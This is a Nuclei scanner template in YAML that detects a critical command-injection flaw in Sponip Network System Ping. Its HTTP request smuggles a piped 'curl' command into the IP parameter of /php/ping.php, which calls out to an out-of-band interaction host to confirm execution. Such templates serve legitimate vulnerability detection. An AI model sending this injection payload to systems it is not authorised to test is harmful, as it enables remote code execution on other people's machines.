nuclei-templates/http/vulnerabilities/other/sponip-network-system-ping-...

42 lines
1.2 KiB
YAML

id: sponip-network-system-ping-rce
info:
name: Sponip Network System Ping - Remote Code Execution
author: pikpikcu
severity: critical
description: |
Sponip Network System Ping is susceptible to remote code execution.
reference:
- https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c735e3e9
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-77
metadata:
max-request: 1
tags: sponip,rce,oast
http:
- raw:
- |
POST /php/ping.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
sondata[ip]=a|curl {{interactsh-url}}&jsondata[type]=1
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: curl"
# digest: 4b0a00483046022100c2af0f9d48a05d20dc258d34fa289aafc283c645822156aee548b4672502e1a3022100ca6001609cc5ed646c98387a096bb505a7f5a3d0086cef35fc62e2f6c3c728b9:922c64590222798bb761d5b6d8e72950